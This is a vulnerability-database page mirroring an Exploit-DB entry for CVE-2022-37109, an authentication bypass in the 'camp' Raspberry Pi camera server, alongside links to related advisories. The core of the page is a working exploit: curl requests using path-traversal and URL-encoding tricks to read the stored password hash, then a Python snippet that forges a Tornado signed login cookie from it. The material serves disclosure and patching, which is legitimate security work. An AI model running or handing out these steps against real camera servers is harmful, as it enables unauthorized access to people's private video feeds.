Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

"camp" Raspberry Pi camera server 1.0 - Authentication Bypass

๐Ÿ—“๏ธย 25 Mar 2023ย 00:00:00Reported byย Elias HohlTypeย 
exploitdb
ย exploitdb๐Ÿ”—ย www.exploit-db.com๐Ÿ‘ย 179ย Views

camp" Raspberry Pi camera server 1.0 Authentication Bypass vulnerability. Exploit allows unauthorized access to "camp" server

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Raspberry Pi Camera Server 1.0 Authentication Bypass Vulnerability
27 Mar 202300:00
โ€“zdt
Circl		CVE-2022-37109
1 May 202519:15
โ€“circl
CNNVD		patrickfuller camp ๅฎ‰ๅ…จๆผๆดž
14 Nov 202200:00
โ€“cnnvd
CVE		CVE-2022-37109
14 Nov 202200:00
โ€“cve
Cvelist		CVE-2022-37109
14 Nov 202200:00
โ€“cvelist
EUVD		EUVD-2022-39762
3 Oct 202520:07
โ€“euvd
NVD		CVE-2022-37109
14 Nov 202221:15
โ€“nvd
Packet Storm		Raspberry Pi Camera Server 1.0 Authentication Bypass
27 Mar 202300:00
โ€“packetstorm
Prion		Improper access control
14 Nov 202221:15
โ€“prion
Positive Technologies		PT-2022-23818 ยท Unknown ยท Patrickfuller Camp
14 Nov 202200:00
โ€“ptsecurity
Rows per page
# Exploit Title: "camp" Raspberry Pi camera server 1.0 -  Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109

"camp" Raspberry Pi camera server Authentication Bypass vulnerability

https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904

1. Start an instance of the "camp" server:
python3 server.py --require-login

2. Fetch the SHA-512 password hash using one of these methods:

curl http://localhost:8000/static/password.tx%74

OR

curl http://localhost:8000/static/./password.txt --path-as-is

OR

curl http://localhost:8000/static/../camp/password.txt --path-as-is

3. Execute the following python snippet (replace the hash with the hash you received in step 2).

from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))

4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Mar 2023 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.06951
SSVC
raspberry piauthentication bypassvulnerabilityexploitubuntu 20.04cve-2022-37109serversha-512password hashcookie-based authentication.
179